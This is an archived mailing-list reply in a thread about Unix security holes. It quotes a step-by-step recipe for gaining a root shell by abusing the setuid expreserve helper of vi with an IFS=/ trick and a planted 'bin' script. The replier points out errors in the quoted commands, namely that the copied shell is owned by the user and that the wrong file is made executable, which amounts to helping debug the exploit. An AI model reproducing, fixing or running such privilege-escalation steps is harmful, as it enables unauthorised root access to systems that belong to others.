Re: chmod 000 .rhosts - works?

• Messages sorted by: [ date ][ thread ][ subject ][ author ]
• Next message: Chris Ellwood: "Re: Internet Worm"
• Previous message: Michael Shanzer: "Re: Speaking of finger"
• In reply to: Charles Howes: "Re: chmod 000 .rhosts - works?"
• Next in thread: Charles Howes: "Re: chmod 000 .rhosts - works?"

Charles Howes said...
> ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
>   versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
>   with 'system()'.  So, do the following:
>     % cd /tmp
>     % cp /bin/sh fubar
>     % cat > bin
>     chmod 4755 fubar
>     ^D
>     % chmod u+x fubar

I see a couple problems with the script so far.  /bin/sh was copied
to fubar while you are a regular user, so it will be owned by you
and you'll end up with a nice copy of /bin/sh that's setuid to you,
not your target user.  Also, that last line should probably read 
'chmod u+x bin', not fubar.

>     % setenv IFS=/
>     % vi
>     :pre
>     :q
>     % fubar
>     #
>   Some versions of expreserve don't have the hole.
>   Some versions of vi don't have the :pre command.
>   One does not imply the other.

Thanks for posting it anyway.

- Chris

• Next message: Chris Ellwood: "Re: Internet Worm"
• Previous message: Michael Shanzer: "Re: Speaking of finger"
• In reply to: Charles Howes: "Re: chmod 000 .rhosts - works?"
• Next in thread: Charles Howes: "Re: chmod 000 .rhosts - works?"